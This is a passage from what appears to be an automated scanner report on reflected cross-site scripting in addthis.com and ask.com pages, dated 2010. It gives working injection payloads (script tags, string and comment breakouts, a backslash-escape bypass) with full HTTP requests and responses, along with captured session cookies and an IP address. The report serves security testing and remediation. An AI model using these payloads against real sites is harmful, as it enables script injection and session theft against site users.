<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C4a576<script>alert(1)</script>28122e63156/script%3E57c7a554130</strong>
...[SNIP]...

2.133. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa552"-alert(1)-"7ce969362f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rtbcstsg2h8rgbhq9g2pvhc250; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3Cfa552"-alert(1)-"7ce969362f7/script%3E57c7a554130";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPa
...[SNIP]...

2.134. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d83"-alert(1)-"f43f83f718e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=kai74u0c5hi68smm3pfra1et05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130e0d83"-alert(1)-"f43f83f718e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.135. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df1a<script>alert(1)</script>ff4fc4b5c4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=pa4nmf2sogo37cd58aeki3on15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a5541304df1a<script>alert(1)</script>ff4fc4b5c4c</strong>
...[SNIP]...

2.136. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9df66<script>alert(1)</script>548f4c9c066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; uid=4cb0ff004a7b228e; psc=0; di=%7B%7D..1290218488.60|1286670077.66; dt=X

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:11:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=0urtvj47g39mh5kr9tnnta4sa0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(DOCUMENT.COOKIES)%3C/script%3E57c7a554130?9df66<script>alert(1)</script>548f4c9c066=1</strong>
...[SNIP]...

2.137. http://www.ask.com/pictures [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29fdb'%3balert(1)//4d917efb5f3 was submitted in the l parameter. This input was echoed as 29fdb';alert(1)//4d917efb5f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?q=Ohio&o=0&l=29fdb'%3balert(1)//4d917efb5f3&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 18:02:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:02:42 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=29fdb';alert(1)//4d917efb5f3"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAyOjQyLVVUQw%3D%3D&po=0&pp=29fdb%27%3Balert%281%29%2F%2F4d917efb5f3; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:42 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:42 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 112554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=ADABB184D90011265DC483D042F04B4F&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=29fdb';alert(1)//4d917efb5f3';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

2.138. http://www.ask.com/pictures [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the l request parameter is copied into a JavaScript rest-of-line comment. The payload ec4a3%0aalert(1)//34861841eee was submitted in the l parameter. This input was echoed as ec4a3
alert(1)//34861841eee
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?q=Ohio&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88aec4a3%0aalert(1)//34861841eee&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:02:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:02:46 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3 alert(1)//34861841eee"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAyOjQ2LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28DOCUMENT.COOKIES%29%2F%2Fd1f92dec88aec4a3%0Aalert%281%29%2F%2F34861841eee; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:46 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:46 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 117754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...



var _matchUrl = '/afc-match?q=Ohio&page=1&ac=24&qid=5FE0A0EC710BBBF7BFB5CE57623B5A62&qsrc=3015&dm=all&qrt=2&lid=5490&o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88aec4a3
alert(1)//34861841eee
';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=p&lodid=us";


...[SNIP]...

2.139. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd16d\'%3b4e4b316f914 was submitted in the q parameter. This input was echoed as cd16d\\';4e4b316f914 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?q=Ohiocd16d\'%3b4e4b316f914&o=0&l=dir5fb41'%3balert(DOCUMENT.COOKIES)%2f%2fd1f92dec88a&qsrc=3015 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:00:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:00:41 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(DOCUMENT.COOKIES)//d1f92dec88a"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAwOjQxLVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28DOCUMENT.COOKIES%29%2F%2Fd1f92dec88a; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:00:41 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 52634


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
ecieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'Ohiocd16d\\';4e4b316f914';
google_kw = 'Ohiocd16d\\';4e4b316f914';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCa
...[SNIP]...

2.140. http://www.ask.com/pictureslanding [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb41'%3balert(1)//d1f92dec88a was submitted in the l parameter. This input was echoed as 5fb41';alert(1)//d1f92dec88a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding?o=0&l=dir5fb41'%3balert(1)//d1f92dec88a HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:57:00 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dir5fb41';alert(1)//d1f92dec88a"; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU3OjAwLVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%281%29%2F%2Fd1f92dec88a; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 45895


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<title>Im
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=CE733406B7019A88A2CE1DFC35FAC6DE&qsrc=121&dm=all&qrt=2&lid=&o=0&l=dir5fb41';alert(1)//d1f92dec88a';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=ph&lodid=us";


...[SNIP]...

2.141. http://www.ask.com/pictureslanding [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68661\'%3bad7a82f13fb was submitted in the q parameter. This input was echoed as 68661\\';ad7a82f13fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictureslanding?q=68661\'%3bad7a82f13fb&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 17:57:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:57:37 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir5fb41; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
